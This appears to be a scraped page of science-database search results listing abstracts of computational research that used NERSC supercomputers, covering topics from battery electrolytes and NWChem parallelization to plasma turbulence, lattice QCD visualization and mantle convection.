    The PEO3:LiCF3SO3 polymer electrolyte has attracted significant research due to its high conductivity and enhanced stability in lithium polymer batteries. Most experimental studies have shown that amorphous PEO lithium salt electrolytes have higher conductivity than the crystalline ones. Other studies, however, have shown that crystalline phase can conduct ions. In this work, we use ab initio molecular dynamics simulations to obtain the amorphous structure of PEO3:LiCF3SO3. The diffusion pathways and activation energies of lithium ions in both crystalline and amorphous PEO3:LiCF3SO3 are determined with first-principles density functional theory. In crystalline PEO3:LiCF3SO3, the activation energy for the low-barrier diffusion pathway is approximately 1.0 eV. In the amorphous phase, the value is 0.6 eV. This result would support the experimental observation that amorphous PEO3:LiCF3SO3has higher ionic conductivity than the crystalline phase. This work was supported by NASA Grant No. NNX13AN01A and by Tulsa Institute of Alternative Energy and Tulsa Institute of Nanotechnology. This research used resources of XSEDE, NERSC, and the Tandy Supercomputing Center.

  18. Thread-Level Parallelization and Optimization of NWChem for the Intel MIC Architecture

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Shan, Hongzhang; Williams, Samuel; Jong, Wibe de

    In the multicore era it was possible to exploit the increase in on-chip parallelism by simply running multiple MPI processes per chip. Unfortunately, manycore processors' greatly increased thread- and data-level parallelism coupled with a reduced memory capacity demand an altogether different approach. In this paper we explore augmenting two NWChem modules, triples correction of the CCSD(T) and Fock matrix construction, with OpenMP in order that they might run efficiently on future manycore architectures. As the next NERSC machine will be a self-hosted Intel MIC (Xeon Phi) based supercomputer, we leverage an existing MIC testbed at NERSC to evaluate our experiments.more » In order to proxy the fact that future MIC machines will not have a host processor, we run all of our experiments in tt native mode. We found that while straightforward application of OpenMP to the deep loop nests associated with the tensor contractions of CCSD(T) was sufficient in attaining high performance, significant effort was required to safely and efficiently thread the TEXAS integral package when constructing the Fock matrix. Ultimately, our new MPI OpenMP hybrid implementations attain up to 65x better performance for the triples part of the CCSD(T) due in large part to the fact that the limited on-card memory limits the existing MPI implementation to a single process per card. Additionally, we obtain up to 1.6x better performance on Fock matrix constructions when compared with the best MPI implementations running multiple processes per card.« less

  19. Thread-level parallelization and optimization of NWChem for the Intel MIC architecture

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Shan, Hongzhang; Williams, Samuel; de Jong, Wibe

    In the multicore era it was possible to exploit the increase in on-chip parallelism by simply running multiple MPI processes per chip. Unfortunately, manycore processors' greatly increased thread- and data-level parallelism coupled with a reduced memory capacity demand an altogether different approach. In this paper we explore augmenting two NWChem modules, triples correction of the CCSD(T) and Fock matrix construction, with OpenMP in order that they might run efficiently on future manycore architectures. As the next NERSC machine will be a self-hosted Intel MIC (Xeon Phi) based supercomputer, we leverage an existing MIC testbed at NERSC to evaluate our experiments.more » In order to proxy the fact that future MIC machines will not have a host processor, we run all of our experiments in native mode. We found that while straightforward application of OpenMP to the deep loop nests associated with the tensor contractions of CCSD(T) was sufficient in attaining high performance, significant e ort was required to safely and efeciently thread the TEXAS integral package when constructing the Fock matrix. Ultimately, our new MPI+OpenMP hybrid implementations attain up to 65× better performance for the triples part of the CCSD(T) due in large part to the fact that the limited on-card memory limits the existing MPI implementation to a single process per card. Additionally, we obtain up to 1.6× better performance on Fock matrix constructions when compared with the best MPI implementations running multiple processes per card.« less

  20. Highly Efficient Parallel Multigrid Solver For Large-Scale Simulation of Grain Growth Using the Structural Phase Field Crystal Model

    NASA Astrophysics Data System (ADS)

    Guan, Zhen; Pekurovsky, Dmitry; Luce, Jason; Thornton, Katsuyo; Lowengrub, John

    The structural phase field crystal (XPFC) model can be used to model grain growth in polycrystalline materials at diffusive time-scales while maintaining atomic scale resolution. However, the governing equation of the XPFC model is an integral-partial-differential-equation (IPDE), which poses challenges in implementation onto high performance computing (HPC) platforms. In collaboration with the XSEDE Extended Collaborative Support Service, we developed a distributed memory HPC solver for the XPFC model, which combines parallel multigrid and P3DFFT. The performance benchmarking on the Stampede supercomputer indicates near linear strong and weak scaling for both multigrid and transfer time between multigrid and FFT modules up to 1024 cores. Scalability of the FFT module begins to decline at 128 cores, but it is sufficient for the type of problem we will be examining. We have demonstrated simulations using 1024 cores, and we expect to achieve 4096 cores and beyond. Ongoing work involves optimization of MPI/OpenMP-based codes for the Intel KNL Many-Core Architecture. This optimizes the code for coming pre-exascale systems, in particular many-core systems such as Stampede 2.0 and Cori 2 at NERSC, without sacrificing efficiency on other general HPC systems.

  1. Simulations of laser-driven ion acceleration from a thin CH target

    NASA Astrophysics Data System (ADS)

    Park, Jaehong; Bulanov, Stepan; Ji, Qing; Steinke, Sven; Treffert, Franziska; Vay, Jean-Luc; Schenkel, Thomas; Esarey, Eric; Leemans, Wim; Vincenti, Henri

    2017-10-01

    2D and 3D computer simulations of laser driven ion acceleration from a thin CH foil using code WARP were performed. As the foil thickness varies from a few nm to μm, the simulations confirm that the acceleration mechanism transitions from the RPA (radiation pressure acceleration) to the TNSA (target normal sheath acceleration). In the TNSA regime, with the CH target thickness of 1 μ m and a pre-plasma ahead of the target, the simulations show the production of the collimated proton beam with the maximum energy of about 10 MeV. This agrees with the experimental results obtained at the BELLA laser facility (I 5 × 18 W / cm2 , λ = 800 nm). Furthermore, the maximum proton energy dependence on different setups of the initialization, i.e., different angles of the laser incidence from the target normal axis, different gradient scales and distributions of the pre-plasma, was explored. This work was supported by LDRD funding from LBNL, provided by the U.S. DOE under Contract No. DE-AC02-05CH11231, and used resources of the NERSC, a DOE office of Science User Facility supported by the U.S. DOE under Contract No. DE-AC02-05CH11231.

  2. Spark and HPC for High Energy Physics Data Analyses

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Sehrish, Saba; Kowalkowski, Jim; Paterno, Marc

    A full High Energy Physics (HEP) data analysis is divided into multiple data reduction phases. Processing within these phases is extremely time consuming, therefore intermediate results are stored in files held in mass storage systems and referenced as part of large datasets. This processing model limits what can be done with interactive data analytics. Growth in size and complexity of experimental datasets, along with emerging big data tools are beginning to cause changes to the traditional ways of doing data analyses. Use of big data tools for HEP analysis looks promising, mainly because extremely large HEP datasets can be representedmore » and held in memory across a system, and accessed interactively by encoding an analysis using highlevel programming abstractions. The mainstream tools, however, are not designed for scientific computing or for exploiting the available HPC platform features. We use an example from the Compact Muon Solenoid (CMS) experiment at the Large Hadron Collider (LHC) in Geneva, Switzerland. The LHC is the highest energy particle collider in the world. Our use case focuses on searching for new types of elementary particles explaining Dark Matter in the universe. We use HDF5 as our input data format, and Spark to implement the use case. We show the benefits and limitations of using Spark with HDF5 on Edison at NERSC.« less

  3. Understanding the spin-driven polarizations in Bi MO3 (M = 3 d transition metals) multiferroics

    NASA Astrophysics Data System (ADS)

    Kc, Santosh; Lee, Jun Hee; Cooper, Valentino R.

    Bismuth ferrite (BiFeO3) , a promising multiferroic, stabilizes in a perovskite type rhombohedral crystal structure (space group R3c) at room temperature. Recently, it has been reported that in its ground state it possess a huge spin-driven polarization. To probe the underlying mechanism of this large spin-phonon response, we examine these couplings within other Bi based 3 d transition metal oxides Bi MO3 (M = Ti, V, Cr, Mn, Fe, Co, Ni) using density functional theory. Our results demonstrate that this large spin-driven polarization is a consequence of symmetry breaking due to competition between ferroelectric distortions and anti-ferrodistortive octahedral rotations. Furthermore, we find a strong dependence of these enhanced spin-driven polarizations on the crystal structure; with the rhombohedral phase having the largest spin-induced atomic distortions along [111]. These results give us significant insights into the magneto-electric coupling in these materials which is essential to the magnetic and electric field control of electric polarization and magnetization in multiferroic based devices. Research is supported by the US Department of Energy, Office of Science, Basic Energy Sciences, Materials Science and Engineering Division and the Office of Science Early Career Research Program (V.R.C) and used computational resources at NERSC.

  4. Suppressing Electron Turbulence and Triggering Internal Transport Barriers with Reversed Magnetic Shear in the National Spherical Torus Experiment

    NASA Astrophysics Data System (ADS)

    Peterson, Jayson Luc

    2011-10-01

    Observations in the National Spherical Torus Experiment (NSTX) have found electron temperature gradients that greatly exceed the linear threshold for the onset for electron temperature gradient-driven (ETG) turbulence. These discharges, deemed electron internal transport barriers (e-ITBs), coincide with a reversal in the shear of the magnetic field and with a reduction in electron-scale density fluctuations, qualitatively consistent with earlier gyrokinetic predictions. To investigate this phenomenon further, we numerically model electron turbulence in NSTX reversed-shear plasmas using the gyrokinetic turbulence code GYRO. These first-of-a-kind nonlinear gyrokinetic simulations of NSTX e-ITBs confirm that reversing the magnetic shear can allow the plasma to reach electron temperature gradients well beyond the critical gradient for the linear onset of instability. This effect is very strong, with the nonlinear threshold for significant transport approaching three times the linear critical gradient in some cases, in contrast with moderate shear cases, which can drive significant ETG turbulence at much lower gradients. In addition to the experimental implications of this upshifted nonlinear critical gradient, we explore the behavior of ETG turbulence during reversed shear discharges. This work is supported by the SciDAC Center for the Study of Plasma Microturbulence, DOE Contract DE-AC02-09CH11466, and used the resources of NCCS at ORNL and NERSC at LBNL. M. Ono et al., Nucl. Fusion 40, 557 (2000).

  5. Using OFI libfabric on Cori/Edison

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Pritchard, Howard Porter; Choi, Sung-Eun

    2016-08-22

    These are slides from a presentation during an NERSC site visit to Los Alamos National Laboratory. The following topics are covered: building/installing libfabric, OpenMPI using libfabric, MPICH using libfabric, Open SHMEM (Sandia), other applications, and what is next. The next steps are: get a libfabric 1.4 out, it would be nice to have libfabric 1.4 installed in system space on Cori, add libfabric modules on Cori, might be a good idea to have a SLURM PMI module to simplify its use when building/using Open MPI and MPICH built to use libfabric, and upgrade Edison to CLE 5.2 UP04 or newer.

  6. Preface: SciDAC 2009

    NASA Astrophysics Data System (ADS)

    Simon, Horst

    2009-07-01

    By almost any measure, the SciDAC community has come a long way since DOE launched the SciDAC program back in 2001. At the time, we were grappling with how to efficiently run applications on terascale systems (the November 2001 TOP500 list was led by DOE's ASCI White IBM system at Lawrence Livermore achieving 7.2 teraflop/s). And the results stemming from the first round of SciDAC projects were summed up in two-page reports. The scientific results were presented at annual meetings, which were by invitation only and typically were attended by about 75 researchers. Fast forward to 2009 and we now have SciDAC Review, a quarterly magazine showcasing the scientific computing contributions of SciDAC projects and related programs, all focused on presenting a comprehensive look at Scientific Discovery through Advanced Computing. That is also the motivation behind the annual SciDAC conference that in 2009 was held from June 14-18 in San Diego. The annual conference, which can also be described as a celebration of all things SciDAC, grew out those meetings organized in the early days of the program. In 2005, the meeting was held in San Francisco and attendance was opened up to all members of the SciDAC community. The schedule was also expanded to include a keynote address, plenary speakers and other features found in a conference format. This year marks the fifth such SciDAC conference, which now comprises four days of computational science presentations, multiple poster sessions and, since last year, an evening event showcasing simulations and modeling runs resulting from SciDAC projects. The fifth annual SciDAC conference was remarkable on several levels. The primary purpose, of course, is to showcase the research accomplishments resulting from SciDAC programs in particular and computational science in general. It is these accomplishments, represented in 38 papers and 52 posters, that comprise this set of conference proceedings. These proceedings can stand alone as evidence of the success of DOE's innovative SciDAC efforts. But from the outset, a critical driver for the program was to foster increased collaboration among researchers across disciplines and organizations. In particular, SciDAC wanted to engage scientists at universities in the projects, both to expand the community and to develop the next generation of computational scientists. At the meeting in San Diego, the fruits of this emphasis were clearly visible, from the special poster session highlighting the work of the DOE Computational Science Graduate Fellows, to the informal discussions in hotel hallways, to focused side meetings apart from the main presentations. A highlight of the meeting was the keynote address by Dr Ray Orbach, until recently the DOE Under Secretary for Science and head of the Office of Science. It was during his tenure that the first round of projects matured and the second set of SciDAC projects were launched. And complementing these research projects was Dr Orbach's vision for INCITE, DOE's Innovative and Novel Computational Impact on Theory and Experiment program, inaugurated in 2003. This program allocated significant HPC resources to scientists tackling high-impact problems, including some of those addressed by SciDAC teams. Together, SciDAC and INCITE are dramatically accelerating the field of computational science. As has been noted before, the SciDAC conference celebrates progress in advancing science through large-scale modeling and simulation. Over 400 people registered to attend this year's talks, poster sessions and tutorials, all spanning the disciplines supported by DOE. While the principal focus was on SciDAC accomplishments, this year's conference also included invited presentations and posters from colleagues whose research is supported by other agencies. At the 2009 meeting we also formalized a developing synergy with the Department of Defense's HPC Users Group Meeting, which has occasionally met in parallel with the SciDAC meeting. But in San Diego, we took the additional steps of organizing a joint poster session and a joint plenary session, further advancing opportunities for broader networking. Throughout the four-day program, attendees at both meetings had the option of sitting in on sessions at either conference. We also included several of the NSF Petascale applications in the program, and have also extended invitations to our computational colleagues in other federal agencies, including the National Science Foundation, NASA, and the National Oceanographic and Atmospheric Administration, as well as international collaborators to join us in San Diego. In 2009 we also reprised one of the more popular sessions from Seattle in 2008, the Electronic Visualization and Poster Night, during which 29 scientific visualizations were presented on high-resolution large-format displays. The best entries were awarded one of the coveted 'OASCR Awards.' The conference also featured a session about breakthroughs in computational science, based on the 'Breakthrough Report' that was published in 2008, led by Tony Mezzacappa (ORNL). Tony was also the chair of the SciDAC 2005 conference. For the third consecutive year, the conference was followed by a day of tutorials organized by the SciDAC Outreach Center and aimed primarily at students interested in scientific computing. This year, nearly 100 participants attended the tutorials, hosted by the San Diego Supercomputer Center and General Atomics. This outreach to the broader community is really what SciDAC is all about - Scientific Discovery through Advanced Computing. Such discoveries are not confined by organizational lines, but rather are often the result of researchers reaching out and collaborating with others, using their combined expertise to push our boundaries of knowledge. I am happy to see that this vision is shared by so many researchers in computational science, who all decided to join SciDAC 2009. While credit for the excellent presentations and posters goes to the teams of researchers, the success of this year's conference is due to the strong efforts and support from members of the 2009 SciDAC Program Committee and Organizing Committee, and I would like to extend my heartfelt thanks to them for helping to make the 2009 meeting the largest and most successful to date. Program Committee members were: David Bader, LLNL; Pete Beckman, ANL; John Bell, LBNL; John Boisseau, University of Texas; Paul Bonoli, MIT; Hank Childs, LBNL; Bill Collins, LBNL; Jim Davenport, BNL; David Dean, ORNL; Thom Dunning, NCSA; Peg Folta, LLNL; Glenn Hammond, PNNL; Maciej Haranczyk, LBNL; Robert Harrison, ORNL; Paul Hovland, ANL; Paul Kent, ORNL; Aram Kevorkian, SPAWAR; David Keyes, Columbia University; Kwok Ko, SLAC; Felice Lightstone, LLNL; Bob Lucas, ISI/USC; Paul Mackenzie, Fermilab; Tony Mezzacappa, ORNL; John Negele, MIT; Jeff Nichols, ORNL; Mike Norman, UCSD; Joe Oefelein, SNL; Jeanie Osburn, NRL; Peter Ostroumov, ANL; Valerio Pascucci, University of Utah; Ruth Pordes, Fermilab; Rob Ross, ANL; Nagiza Samatova, ORNL; Martin Savage, University of Washington; Tim Scheibe, PNNL; Ed Seidel, NSF; Arie Shoshani, LBNL; Rick Stevens, ANL; Bob Sugar, UCSB; Bill Tang, PPPL; Bob Wilhelmson, NCSA; Kathy Yelick, NERSC/LBNL; Dave Zachmann, Vista Computational Technology LLC. Organizing Committee members were: Communications: Jon Bashor, LBNL. Contracts/Logistics: Mary Spada and Cheryl Zidel, ANL. Posters: David Bailey, LBNL. Proceedings: John Hules, LBNL. Proceedings Database Developer: Beth Cerny Patino, ANL. Program Committee Liaison/Conference Web Site: Yeen Mankin, LBNL. Tutorials: David Skinner, NERSC/LBNL. Visualization Night: Hank Childs, LBNL; Valerio Pascucci, Chems Touati, Nathan Galli, and Erik Jorgensen, University of Utah. Again, my thanks to all. Horst Simon San Diego, California June 18, 2009

  7. Radiative and Auger recombination of degenerate carriers in InN

    NASA Astrophysics Data System (ADS)

    McAllister, Andrew; Bayerl, Dylan; Kioupakis, Emmanouil

    Group-III nitrides find applications in many fields - energy conversion, sensors, and solid-state lighting. The band gaps of InN, GaN and AlN alloys span the infrared to ultraviolet spectral range. However, nitride optoelectronic devices suffer from a drop in efficiency as carrier density increases. A major component of this decrease is Auger recombination, but its influence is not fully understood, particularly for degenerate carriers. For nondegenerate carriers the radiative rate scales as the carrier density squared, while the Auger rate scales as the density cubed. However, it is unclear how these power laws decrease as carriers become degenerate. Using first-principles calculations we studied the dependence of the radiative and Auger recombination rates on carrier density in InN. We found a more complex dependence on the Auger rate than expected. The power law of the Auger rate changes at different densities depending on the type of Auger process involved and the type of carriers that have become degenerate. In contrast, the power law of the radiative rate changes when either carrier type becomes degenerate. This creates problems in designing devices, as Auger remains a major contributor to carrier recombination at densities for which radiative recombination is suppressed by phase-space filling. This work was supported by NSF (GRFP DGE 1256260 and CAREER DMR-1254314). Computational resources provided by the DOE NERSC facility (DE-AC02-05CH11231).

  8. Visualization Tools for Lattice QCD - Final Report

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Massimo Di Pierro

    2012-03-15

    Our research project is about the development of visualization tools for Lattice QCD. We developed various tools by extending existing libraries, adding new algorithms, exposing new APIs, and creating web interfaces (including the new NERSC gauge connection web site). Our tools cover the full stack of operations from automating download of data, to generating VTK files (topological charge, plaquette, Polyakov lines, quark and meson propagators, currents), to turning the VTK files into images, movies, and web pages. Some of the tools have their own web interfaces. Some Lattice QCD visualization have been created in the past but, to our knowledge,more » our tools are the only ones of their kind since they are general purpose, customizable, and relatively easy to use. We believe they will be valuable to physicists working in the field. They can be used to better teach Lattice QCD concepts to new graduate students; they can be used to observe the changes in topological charge density and detect possible sources of bias in computations; they can be used to observe the convergence of the algorithms at a local level and determine possible problems; they can be used to probe heavy-light mesons with currents and determine their spatial distribution; they can be used to detect corrupted gauge configurations. There are some indirect results of this grant that will benefit a broader audience than Lattice QCD physicists.« less

  9. High-Performance Computing Data Center | Energy Systems Integration

    Science.gov Websites

    Facility | NREL High-Performance Computing Data Center High-Performance Computing Data Center The Energy Systems Integration Facility's High-Performance Computing Data Center is home to Peregrine -the largest high-performance computing system in the world exclusively dedicated to advancing

  10. Berkeley Lab - Materials Sciences Division

    Science.gov Websites

    Computational Study of Excited-State Phenomena in Energy Materials Center for X-ray Optics MSD Facilities Ion and Materials Physics Scattering and Instrumentation Science Centers Center for Computational Study of Sciences Centers Center for Computational Study of Excited-State Phenomena in Energy Materials Center for X

  11. High-Performance Computing Data Center Warm-Water Liquid Cooling |

    Science.gov Websites

    Computational Science | NREL Warm-Water Liquid Cooling High-Performance Computing Data Center Warm-Water Liquid Cooling NREL's High-Performance Computing Data Center (HPC Data Center) is liquid water Liquid cooling technologies offer a more energy-efficient solution that also allows for effective

  12. Precision searches in dijets at the HL-LHC and HE-LHC

    NASA Astrophysics Data System (ADS)

    Chekanov, S. V.; Childers, J. T.; Proudfoot, J.; Wang, R.; Frizzell, D.

    2018-05-01

    This paper explores the physics reach of the High-Luminosity Large Hadron Collider (HL-LHC) for searches of new particles decaying to two jets. We discuss inclusive searches in dijets and b-jets, as well as searches in semi-inclusive events by requiring an additional lepton that increases sensitivity to different aspects of the underlying processes. We discuss the expected exclusion limits for generic models predicting new massive particles that result in resonant structures in the dijet mass. Prospects of the Higher-Energy LHC (HE-LHC) collider are also discussed. The study is based on the Pythia8 Monte Carlo generator using representative event statistics for the HL-LHC and HE-LHC running conditions. The event samples were created using supercomputers at NERSC.

  13. The HIBEAM Manual

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Fawley, William M.

    2000-02-01

    HIBEAM is a 2 1/2D particle-in-cell (PIC) simulation code developed in the late 1990's in the Heavy-Ion Fusion research program at Lawrence Berkeley National Laboratory. The major purpose of HIBEAM is to simulate the transverse (i.e., X-Y) dynamics of a space-charge-dominated, non-relativistic heavy-ion beam being transported in a static accelerator focusing lattice. HIBEAM has been used to study beam combining systems, effective dynamic apertures in electrostatic quadrupole lattices, and emittance growth due to transverse misalignments. At present, HIBEAM runs on the CRAY vector machines (C90 and J90's) at NERSC, although it would be relatively simple to port the code tomore » UNIX workstations so long as IMSL math routines were available.« less

  14. Post-pyrite transition in SiO2

    NASA Astrophysics Data System (ADS)

    Ho, K.; Wu, S.; Umemoto, K.; Wentzcovitch, R. M.; Ji, M.; Wang, C.

    2010-12-01

    Here we propose a new phase of SiO2 beyond the pyrite-type phase. SiO2 is one of the most important minerals in Earth and planetary sciences. So far, the pyrite-type phase has been identified experimentally as the highest-pressure form of SiO2. In solar giants and extrasolar planets whose interior pressures are considerably higher than that on Earth, a post-pyrite transition in SiO2 may occur at ~ 1 TPa as a result of the dissociation of MgSiO3 post-perovskite into MgO and SiO2 [Umemtoto et al., Science 311, 983 (2006)]. Several dioxides considered to be low-pressure analogs of SiO2 have a phase with cotunnite-type (PbCl2-type) structure as the post-pyrite phase. However, a first-principles structural search using a genetic algorithm shows that SiO2 should undergo a post-pyrite transition to a hexagonal phase, not to the cotunnite phase. The hexagonal phase is energetically very competitive with the cotunnite-type one. This work was supported by the U.S. Department of Energy, Office of Basic Energy Science, Division of Materials Sciences and Engineering and NSF under ATM-0428774 (VLab), EAR-0757903, and EAR-1019853. Ames Laboratory is operated for the U.S. Department of Energy by Iowa State University under Contract No. DE-AC02-07CH11358. The computations were performed at the National Energy Research Supercomputing Centre (NERSC) and the Minnesota Supercomputing Institute (MSI).

  15. Effect of Magnetic Islands on Divertors in Tokamaks and Stellarators

    NASA Astrophysics Data System (ADS)

    Punjabi, Alkesh; Boozer, Allen

    2017-10-01

    Divertors are required for handling the plasma particle and heat exhausts on the walls in fusion plasmas. Relatively simple methods, models, and maps from field line Hamiltonian are developed to better understand the interaction of strong plasma shaping and magnetic islands on the size and behavior of the magnetic flux tubes that go from the plasma edge to the wall in non-axisymmetric system. This approach is applicable not only in tokamaks but also in stellarators. Stellarator diverters in which magnetic islands are dominant are called resonant and when shaping is dominant are called non-resonant. Optimized stellarators generally have sharp edges on their surface, but unlike the case for tokamaks these edges do not encircle the entire plasma, so they do not define an edge value for the rotational transform. The approach is used in the DIII-D tokamak. Computation results are consistent with the predictions of the models. Further simulations are being done to understand why the transition from an effective cubic to a linear increase in loss time and area of footprint occurs and whether this increase is discontinuous or not. This work is supported by the US DOE Grants DE-FG02-01ER54624 and DE-FG02-04ER54793 to Hampton University and DE-FG02-95ER54333 to Columbia University. This research used resources of the NERSC, supported by the Office of Science, US DOE, under Contract No. DE-AC02-05CH11231.

  16. Laboratory Computing Resource Center

    Science.gov Websites

    Systems Computing and Data Resources Purchasing Resources Future Plans For Users Getting Started Using LCRC Software Best Practices and Policies Getting Help Support Laboratory Computing Resource Center Laboratory Computing Resource Center Latest Announcements See All April 27, 2018, Announcements, John Low

  17. Exploring Electric Polarization Mechanisms in Multiferroic Oxides

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Tyson, Trevor A.

    2017-01-24

    Multiferroic oxides are a class of systems which exhibit coupling between the electrical polarization and the magnetization. These materials show promise to lead to devices in which ferromagnetic memory can be written with magnetic fields or magnetic bits can be written by an electric field. The work conducted in our research focuses on single phase materials. We studied the detailed coupling of the spin and lattice correlations in these systems. In the first phase of the proposal, we explored the complex spin spiral systems and low temperature behavior of hexagonal layered REMnO 3 (RE= rare earth, Y and Sc) systemmore » following the detailed structural changes which occurred on crossing into the magnetic states. The techniques were applied to other layered materials such as superconductors and thermoelectric where the same layered motif exists. The second phase of the proposal focused on understanding the mechanisms involved in the onset high temperature ferroelectricity ion hexagonal REMnO 3 and at low temperature in E-Type magnetic ordered perovskite REMnO 3. We wsynthesized preovskite small A site multiferroics by high pressure and high temperature methods. Detailed measurement of the structural properties and dynamics were conducted over a range of length scales from atomic to mesoscopic scale using, x-ray absorption spectroscopy, x-ray diffuse scattering, x-ray and neutron pair distribution analysis and high resolution x-ray diffraction. Changes in vibration modes which occur with the onset of polarization were probed with temperature and pressure dependent infrared absorption spectroscopy. In addition the orthorhombic system (small radius RE ions) which is believed to exhibit electronically driven ferroelectricity and is also not understood was examined. The multiple length scale synchrotron based measurements may assist in developing more detailed models of these materials and possibly lead to device applications. The experimental work was complemented by density functional methods to determine the magnetic ground states and ab initio molecular dynamics methods (AIMD) to determine the high temperature structures. Simulation were carried out on supercomputers at the National Energy Research Scientific Computing Center (NERSC). An important contribution of this work was the training of graduate students and postdoctoral researchers in materials synthesis, high pressure methods and synchrotron based spectroscopy and x-ray scattering techniques.« less

  18. Towards high-resolution mantle convection simulations

    NASA Astrophysics Data System (ADS)

    Höink, T.; Richards, M. A.; Lenardic, A.

    2009-12-01

    The motion of tectonic plates at the Earth’s surface, earthquakes, most forms of volcanism, the growth and evolution of continents, and the volatile fluxes that govern the composition and evolution of the oceans and atmosphere are all controlled by the process of solid-state thermal convection in the Earth’s rocky mantle, with perhaps a minor contribution from convection in the iron core. Similar processes govern the evolution of other planetary objects such as Mars, Venus, Titan, and Europa, all of which might conceivably shed light on the origin and evolution of life on Earth. Modeling and understanding this complicated dynamical system is one of the true “grand challenges” of Earth and planetary science. In the past three decades much progress towards understanding the dynamics of mantle convection has been made, with the increasing aid of computational modeling. Numerical sophistication has evolved significantly, and a small number of independent codes have been successfully employed. Computational power continues to increase dramatically, and with it the ability to resolve increasingly finer fluid mechanical structures. Yet, the perhaps most often cited limitation in numerical modeling based publications is still the limitation of computing power, because the ability to resolve thermal boundary layers within the convecting mantle (e.g., lithospheric plates), requires a spatial resolution of ~ 10 km. At present, the largest supercomputing facilities still barely approach the power to resolve this length scale in mantle convection simulations that include the physics necessary to model plate-like behavior. Our goal is to use supercomputing facilities to perform 3D spherical mantle convection simulations that include the ingredients for plate-like behavior, i.e. strongly temperature- and stress-dependent viscosity, at Earth-like convective vigor with a global resolution of order 10 km. In order to qualify to use such facilities, it is also necessary to demonstrate good parallel efficiency. Here we will present two kinds of results: (1) scaling properties of the community code CitcomS on DOE/NERSC's supercomputer Franklin for up to ~ 6000 processors, and (2) preliminary simulations that illustrate the role of a low-viscosity asthenosphere in plate-like behavior in mantle convection.

  19. The Development of University Computing in Sweden 1965-1985

    NASA Astrophysics Data System (ADS)

    Dahlstrand, Ingemar

    In 1965-70 the government agency, Statskontoret, set up five university computing centers, as service bureaux financed by grants earmarked for computer use. The centers were well equipped and staffed and caused a surge in computer use. When the yearly flow of grant money stagnated at 25 million Swedish crowns, the centers had to find external income to survive and acquire time-sharing. But the charging system led to the computers not being fully used. The computer scientists lacked equipment for laboratory use. The centers were decentralized and the earmarking abolished. Eventually they got new tasks like running computers owned by the departments, and serving the university administration.

  20. Using 3D infrared imaging to calibrate and refine computational fluid dynamic modeling for large computer and data centers

    NASA Astrophysics Data System (ADS)

    Stockton, Gregory R.

    2011-05-01

    Over the last 10 years, very large government, military, and commercial computer and data center operators have spent millions of dollars trying to optimally cool data centers as each rack has begun to consume as much as 10 times more power than just a few years ago. In fact, the maximum amount of data computation in a computer center is becoming limited by the amount of available power, space and cooling capacity at some data centers. Tens of millions of dollars and megawatts of power are being annually spent to keep data centers cool. The cooling and air flows dynamically change away from any predicted 3-D computational fluid dynamic modeling during construction and as time goes by, and the efficiency and effectiveness of the actual cooling rapidly departs even farther from predicted models. By using 3-D infrared (IR) thermal mapping and other techniques to calibrate and refine the computational fluid dynamic modeling and make appropriate corrections and repairs, the required power for data centers can be dramatically reduced which reduces costs and also improves reliability.

  1. The future of climate science analysis in a coming era of exascale computing

    NASA Astrophysics Data System (ADS)

    Bates, S. C.; Strand, G.

    2013-12-01

    Projections of Community Earth System Model (CESM) output based on the growth of data archived over 2000-2012 at all of our computing sites (NCAR, NERSC, ORNL) show that we can expect to reach 1,000 PB (1 EB) sometime in the next decade or so. The current paradigms of using site-based archival systems to hold these data that are then accessed via portals or gateways, downloading the data to a local system, and then processing/analyzing the data will be irretrievably broken before then. From a climate modeling perspective, the expertise involved in making climate models themselves efficient on HPC systems will need to be applied to the data as well - providing fast parallel analysis tools co-resident in memory with the data, because the disk I/O bandwidth simply will not keep up with the expected arrival of exaflop systems. The ability of scientists, analysts, stakeholders and others to use climate model output to turn these data into understanding and knowledge will require significant advances in the current typical analysis tools and packages to enable these processes for these vast volumes of data. Allowing data users to enact their own analyses on model output is virtually a requirement as well - climate modelers cannot anticipate all the possibilities for analysis that users may want to do. In addition, the expertise of data scientists, and their knowledge of the model output and their knowledge of best practices in data management (metadata, curation, provenance and so on) will need to be rewarded and exploited to gain the most understanding possible from these volumes of data. In response to growing data size, demand, and future projections, the CESM output has undergone a structure evolution and the data management plan has been reevaluated and updated. The major evolution of the CESM data structure is presented here, along with the CESM experience and role within the CMIP3/CMIP5.

  2. Ground states of larger nuclei

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Pieper, S.C.; Wiringa, R.B.; Pandharipande, V.R.

    1995-08-01

    The methods used for the few-body nuclei require operations on the complete spin-isospin vector; the size of this vector makes such methods impractical for nuclei with A > 8. During the last few years we developed cluster expansion methods that do not require operations on the complete vector. We use the same Hamiltonians as for the few-body nuclei and variational wave functions of form similar to the few-body wave functions. The cluster expansions are made for the noncentral parts of the wave functions and for the operators whose expectation values are being evaluated. The central pair correlations in the wavemore » functions are treated exactly and this requires the evaluation of 3A-dimensional integrals which are done with Monte Carlo techniques. Most of our effort was on {sup 16}O, other p-shell nuclei, and {sup 40}Ca. In 1993 the Mathematics and Computer Science Division acquired a 128-processor IBM SP which has a theoretical peak speed of 16 Gigaflops (GFLOPS). We converted our program to run on this machine. Because of the large memory on each node of the SP, it was easy to convert the program to parallel form with very low communication overhead. Considerably more effort was needed to restructure the program from one oriented towards long vectors for the Cray computers at NERSC to one that makes efficient use of the cache of the RS6000 architecture. The SP made possible complete five-body cluster calculations of {sup 16}O for the first time; previously we could only do four-body cluster calculations. These calculations show that the expectation value of the two-body potential is converging less rapidly than we had thought, while that of the three-body potential is more rapidly convergent; the net result is no significant change to our predicted binding energy for {sup 16}O using the new Argonne v{sub 18} potential and the Urbana IX three-nucleon potential. This result is in good agreement with experiment.« less

  3. An Automated, High-Throughput System for GISAXS and GIWAXS Measurements of Thin Films

    NASA Astrophysics Data System (ADS)

    Schaible, Eric; Jimenez, Jessica; Church, Matthew; Lim, Eunhee; Stewart, Polite; Hexemer, Alexander

